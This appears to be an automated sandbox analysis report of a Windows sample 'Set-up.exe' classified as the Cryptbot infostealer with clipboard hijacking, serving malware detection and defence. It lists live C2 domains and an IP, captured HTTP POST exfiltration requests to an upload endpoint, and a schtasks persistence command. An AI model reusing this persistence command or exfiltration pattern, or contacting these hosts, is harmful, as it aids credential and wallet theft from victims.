Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name: Set-up.exe
Analysis ID: 1525760
MD5: 78b5c3b4fb31188ee6c024ff96ff3807
SHA1: ec49de9a8dee4ee75a2c2e8b53cc380d6d17d702
SHA256: 10409c447cb02b22dbb4a7cfa17335bffc3ccc1e7975596de8b49f0a4045e1e0
Tags: exeuser-aachum
Infos:

Detection

Clipboard Hijacker, Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Clipboard Hijacker
Yara detected Cryptbot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops large PE files
Found evasive API chain (may stop execution after checking mutex)
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
CryptBot A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

AV Detection

barindex
Source: Set-up.exe.7444.0.memstrmin Malware Configuration Extractor: Cryptbot {"C2 list": ["analforeverlovyu.top", "@sevtvx17pt.top", "sevtvx17pt.top"]}
Source: Set-up.exe ReversingLabs: Detection: 44%
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_008F15B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 5_2_008F15B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2914B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 5_2_6C2914B0
Source: Set-up.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: Set-up.exe Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea ecx, dword ptr [esp+04h] 5_2_008F81E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C30AC70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C30AD20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C30AD20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 5_2_6C332EF0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C2AAF80
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C36F960h 5_2_6C2AE8C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 5_2_6C2BE490
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 5_2_6C2BE490
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, ecx 5_2_6C3304E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 5_2_6C2B04F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 5_2_6C2B0610
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 5_2_6C2BA720
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 5_2_6C2BA790
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 5_2_6C2BA790
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 5_2_6C2B0010
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [6C36D014h] 5_2_6C364110
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C2B4203
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 5_2_6C338250
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 5_2_6C2BC2C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 5_2_6C2BA330
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 5_2_6C2BA3A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 5_2_6C2BA3A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C30BDF0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C30BF50
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+04h] 5_2_6C2E9F90
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 5_2_6C349900
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 5_2_6C2E9910
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 5_2_6C2CB98B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 5_2_6C2CB987
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C30BAC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 5_2_6C307AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+0Ch] 5_2_6C2BD424
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C36DFF4h 5_2_6C303440
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+08h] 5_2_6C2BD5A4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 5_2_6C3035F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+04h] 5_2_6C2BD724
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C2BD050
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 5_2_6C327100
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 5_2_6C2BD2B4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C30B280
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 5_2_6C3093B0

Networking

barindex
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.11:49711 -> 185.244.181.140:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.11:49714 -> 185.244.181.140:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.11:49717 -> 185.244.181.140:80
Source: Malware configuration extractor URLs: analforeverlovyu.top
Source: Malware configuration extractor URLs: @sevtvx17pt.top
Source: Malware configuration extractor URLs: sevtvx17pt.top
Source: Joe Sandbox View IP Address: 185.244.181.140 185.244.181.140
Source: Joe Sandbox View ASN Name: BELCLOUDBG BELCLOUDBG
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary49004594User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: sevtvx17pt.top
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary80917368User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 90590Host: sevtvx17pt.top
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary31689036User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 36669Host: sevtvx17pt.top
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: sevtvx17pt.top
Source: global traffic DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
Source: unknown HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary49004594User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: sevtvx17pt.top
Source: Set-up.exe, 00000000.00000003.1580472872.00000000017D3000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1549423156.00000000017D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sevtvx17pt.top/
Source: Set-up.exe, 00000000.00000003.1580472872.00000000017D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sevtvx17pt.top/Qv
Source: Set-up.exe, 00000000.00000003.1580472872.00000000017D3000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1549539364.00000000017EC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1549423156.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1580472872.00000000017ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sevtvx17pt.top/v1/upload.php
Source: Set-up.exe, 00000000.00000003.1580472872.00000000017ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sevtvx17pt.top:80/v1/upload.phpoft
Source: Set-up.exe, 00000000.00000003.1591119251.0000000001D60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Set-up.exe, 00000000.00000003.1591119251.0000000001D60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Set-up.exe, 00000000.00000003.1591119251.0000000001D60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Set-up.exe, 00000000.00000003.1591119251.0000000001D60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Set-up.exe, 00000000.00000003.1591119251.0000000001D60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Set-up.exe, 00000000.00000003.1591119251.0000000001D60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Set-up.exe, 00000000.00000003.1591119251.0000000001D60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: WomwWuRzvwrFDpojKxBm.dll.0.dr String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: Set-up.exe String found in binary or memory: https://serviceupdate32.com/update
Source: Set-up.exe, 00000000.00000003.1591119251.0000000001D60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: Set-up.exe, 00000000.00000003.1591119251.0000000001D60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2A9B99 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard,GetClipboardSequenceNumber, 5_2_6C2A9B99
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2A9B99 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard,GetClipboardSequenceNumber, 5_2_6C2A9B99

System Summary

barindex
Source: C:\Users\user\Desktop\Set-up.exe File dump: service123.exe.0.dr 314617856 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_008F51B0 5_2_008F51B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_008F3E20 5_2_008F3E20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C29CD00 5_2_6C29CD00
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C29EE50 5_2_6C29EE50
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C354E80 5_2_6C354E80
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2A0FC0 5_2_6C2A0FC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2E0870 5_2_6C2E0870
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2D2A7E 5_2_6C2D2A7E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2D4490 5_2_6C2D4490
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2A44F0 5_2_6C2A44F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2C8570 5_2_6C2C8570
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2D0580 5_2_6C2D0580
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2C2110 5_2_6C2C2110
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2DFE10 5_2_6C2DFE10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2D1E40 5_2_6C2D1E40
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2A5880 5_2_6C2A5880
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2DD99E 5_2_6C2DD99E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2EDA20 5_2_6C2EDA20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2BF510 5_2_6C2BF510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2C96A0 5_2_6C2C96A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2D77D0 5_2_6C2D77D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C293000 5_2_6C293000
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2A70C0 5_2_6C2A70C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2D11BE 5_2_6C2D11BE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2E12C0 5_2_6C2E12C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2DF3C0 5_2_6C2DF3C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C365980 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C3638D0 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C365A70 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C363310 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C35AB60 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C363490 appears 45 times
Source: Set-up.exe, 00000000.00000002.2053608610.0000000001814000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameschtasks.exe.muij% vs Set-up.exe
Source: Set-up.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@8/2@2/1
Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\WzGyqvNzOA Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\service123.exe Mutant created: \Sessions\1\BaseNamedObjects\ATatfiYADbBypHtbUUTn
Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to behavior
Source: Set-up.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Set-up.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Set-up.exe, 00000000.00000003.1591537504.0000000001D4D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Set-up.exe ReversingLabs: Detection: 44%
Source: unknown Process created: C:\Users\user\Desktop\Set-up.exe "C:\Users\user\Desktop\Set-up.exe"
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe" Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: womwwurzvwrfdpojkxbm.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: womwwurzvwrfdpojkxbm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: womwwurzvwrfdpojkxbm.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: Set-up.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: Set-up.exe Static file information: File size 9988096 > 1048576
Source: Set-up.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2c3800
Source: Set-up.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x671200
Source: Set-up.exe Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_008F8230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 5_2_008F8230
Source: Set-up.exe Static PE information: section name: .eh_fram
Source: WomwWuRzvwrFDpojKxBm.dll.0.dr Static PE information: section name: .eh_fram
Source: service123.exe.0.dr Static PE information: section name: .eh_fram
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_008FA521 push es; iretd 5_2_008FA694
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2D8C2A push edx; mov dword ptr [esp], ebx 5_2_6C2D8C3E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C304DB0 push eax; mov dword ptr [esp], ebx 5_2_6C305018
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2E4DC1 push eax; mov dword ptr [esp], ebx 5_2_6C2E4DD5
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2D6E03 push edx; mov dword ptr [esp], ebx 5_2_6C2D6E17
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2E4FA1 push eax; mov dword ptr [esp], ebx 5_2_6C2E4FB5
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C30E860 push eax; mov dword ptr [esp], ebx 5_2_6C30E98B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2E285C push edx; mov dword ptr [esp], ebx 5_2_6C2E2870
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2E0852 push eax; mov dword ptr [esp], ebx 5_2_6C2E0866
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2F8850 push eax; mov dword ptr [esp], ebx 5_2_6C2F8E4F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3129A0 push eax; mov dword ptr [esp], ebx 5_2_6C312CD4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3129A0 push edx; mov dword ptr [esp], ebx 5_2_6C312CF3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3409E0 push eax; mov dword ptr [esp], edi 5_2_6C340B5A
